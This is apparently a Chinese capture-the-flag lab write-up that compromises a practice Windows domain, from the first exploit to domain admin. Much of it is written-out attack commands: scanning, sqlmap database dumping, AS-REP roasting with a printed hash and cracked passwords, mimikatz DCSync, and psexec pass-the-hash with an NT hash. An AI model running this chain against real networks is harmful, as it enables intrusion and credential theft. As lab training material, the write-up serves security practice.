信息收集

拿到ip直接访问仍然啥也没有,上fscan扫

1
fscan.exe -h 39.98.108.27

image-20250915091527514

image-20250915091518157

还是啥也没有,使用rustscan做全端口扫描,然后用fscan进行端口信息收集

1
rustscan.exe -a 39.98.108.27 -r 1-65535

image-20250915092555966

image-20250915092839583

1
fscan.exe -h 39.98.108.27 -p 1337,7473,7474,7687,35145

7474-Neo4j-CVE-2021-34371

image-20250915094658447

image-20250915094711650

image-20250924075546140

image-20250924075640642

反弹shell后wget vshell马

image-20250915111710569

1
flag{838821b4-1509-4f21-b121-3fd2135a666c}

提示:Kerberos

image-20250923081835090

内网信息收集+隧道

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
172.22.6.12     DC:DC-PROGAME.xiaorang.lab
Open 172.22.6.12:53
Open 172.22.6.12:135
Open 172.22.6.12:139
Open 172.22.6.12:88
Open 172.22.6.12:389
Open 172.22.6.12:445
Open 172.22.6.12:464
Open 172.22.6.12:593
Open 172.22.6.12:3268
Open 172.22.6.12:3389
Open 172.22.6.12:9389
Open 172.22.6.12:15774
Open 172.22.6.12:47001
Open 172.22.6.12:49664
Open 172.22.6.12:49665
Open 172.22.6.12:49666
Open 172.22.6.12:49667
Open 172.22.6.12:49671
Open 172.22.6.12:49674
Open 172.22.6.12:49675
Open 172.22.6.12:49678
Open 172.22.6.12:49687
Open 172.22.6.12:49771
Open 172.22.6.12:63357
172.22.6.25     XIAORANG\WIN2019
Open 172.22.6.25:135
Open 172.22.6.25:139
Open 172.22.6.25:445
Open 172.22.6.25:3389
Open 172.22.6.25:15774
Open 172.22.6.25:47001
Open 172.22.6.25:49665
Open 172.22.6.25:49666
Open 172.22.6.25:49664
Open 172.22.6.25:49668
Open 172.22.6.25:49667
Open 172.22.6.25:49669
Open 172.22.6.25:49670
Open 172.22.6.25:49675
Open 172.22.6.25:49676
172.22.6.36     ubuntu——已拿下
172.22.6.38     ubuntu
80
22

sql注入拿下172.22.6.38

image-20250923093300305

1
proxychains sqlmap -r 1.txt --dump-all

image-20250923093353602

image-20250923093233639

1
flag{b142f5ce-d9b8-4b73-9012-ad75175ba029}

进入系统

image-20250923093451826

image-20250923093745955

没东西的

AS_REP Roasting打172.22.6.12

获得一堆账号,结合上面的Kerberos联想到AS_REP Roasting攻击

kerbrute_linux_amd64筛选合法用户名

1
proxychains kerbrute_linux_amd64 userenum --dc 172.22.6.12 -d xiaorang.lab 1.txt

使用GetNPUsers查找不需要Kerberos预身份验证的用户

1
proxychains impacket-GetNPUsers -dc-ip 172.22.6.12 -usersfile 1.txt xiaorang.lab/

image-20250923102839633

image-20250923102847713

image-20250923102901931

image-20250923102916705

hashcat爆

1
hashcat.exe -a 0 -m 18200 --force $krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:20f355db7c4b460811e3430fb15654e0$4620c636dad1841a44bba33b52db3ff183d823e2efb4573096d2239116a6a1f25ab5ae0c403e0bc25c5a170a2d59edfc4e0619b575aaab8cbe178aee4a13842372fcd01c2ac7f932bf3abda48030bf1852ce1ea51c4b9c9b5b5b642f471016bfba207811bd94d416c07f147277a6161464f1fcb008cd3fd14ca8ffa6cca872361a1e0bc460abc4150a726c66c2bdcce440011b951a6aec7c6e82c6e8009807ef208269a798acb10296f7d4e7800f5144f13d65515dadaa8f14c1b7ce947231457176810e2af8363f72fdd593a938b13780c007bdd2d42d0e88e9d60faa55d7f6c93550f5b64bc5a0d3e71219 D:/ctf/web/wificrack/dict/rockyou.txt -w 3

image-20250923133756186

image-20250923133950418

1
2
zhangxin@XIAORANG.LAB:strawberry
wenshao@xiaorang.lab:hellokitty
1
proxychains xfreerdp3 /v:172.22.6.25 /u:wenshao /p:'hellokitty' /cert:ignore /drive:/tmp

发现rdp都登的上172.22.6.25,上不了DC(想来没那么轻松)

image-20250923140402230

权限配置错误拿域控

上传sharphound信息收集(多用几个版本)

1
sharphound.exe -c All

image-20250923153701643

image-20250923153624589

YUXUAN这个用户hassidhistroy 域控组用户Admin,只要拿下YUXUAN就能抓出Admin的哈希

winPEAS信息收集一手

1
winPEASany.exe

image-20250923160614357

拿到自动登陆账户yuxuan的明文账密

直接登陆抓域管hash

1
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"

image-20250923160831805

哈希横向

1
proxychains python3 psexec.py -hashes aaaa:04d93ffd6f5f6e4490e0de23f240a5e9 administrator@172.22.6.12

image-20250923161149945

1
flag{65ab6c04-6670-4864-9373-584e3594c5f1}
1
proxychains python3 psexec.py -hashes aaaa:04d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/Administrator@172.22.6.25

image-20250924075329213